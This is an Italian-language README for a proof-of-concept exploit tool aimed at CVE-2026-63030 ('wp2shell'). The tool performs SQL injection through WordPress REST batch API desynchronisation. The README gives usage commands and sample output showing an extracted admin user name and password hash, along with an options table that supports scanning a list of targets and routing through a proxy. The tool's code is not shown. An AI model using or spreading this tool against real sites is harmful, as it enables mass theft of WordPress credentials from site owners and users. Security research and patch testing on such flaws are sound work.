
CVE-2026-63030 (wp2shell) PoC.
Exploit di SQL Injection per Desincronizzazione API Batch WordPress
Strumento Proof of Concept per estrarre utenti e hash di password tramite la vulnerabilità CVE-2026-63030 (wp2shell).
python POC.py <target_url> [options]
python POC.py --rest-route http://target.com
[*] Scanning: http://127.0.0.1/
[*] 1 users found
[+] ID:1 User:admin Hash:$wp$2y$10$Z6gwPduKb7wAbm0bHht1be7SxrgbyxgnbPmTVcVz9nP1KBX811xQy
[*] Requests: 553
| Argomento | Descrizione | Predefinito |
|---|
target | URL singolo del target | - |
-l, --list | File con elenco di target (uno per riga) | - |
--prefix | Prefisso tabella database | wp_ |
--rest-route | Usa ?rest_route= | Disabilitato |
--timeout | Timeout richiesta (secondi) | 30 |
--proxy | Proxy HTTP (compatibile con Burp/ZAP) | Nessuno |
--max-len | Lunghezza massima estrazione | 255 |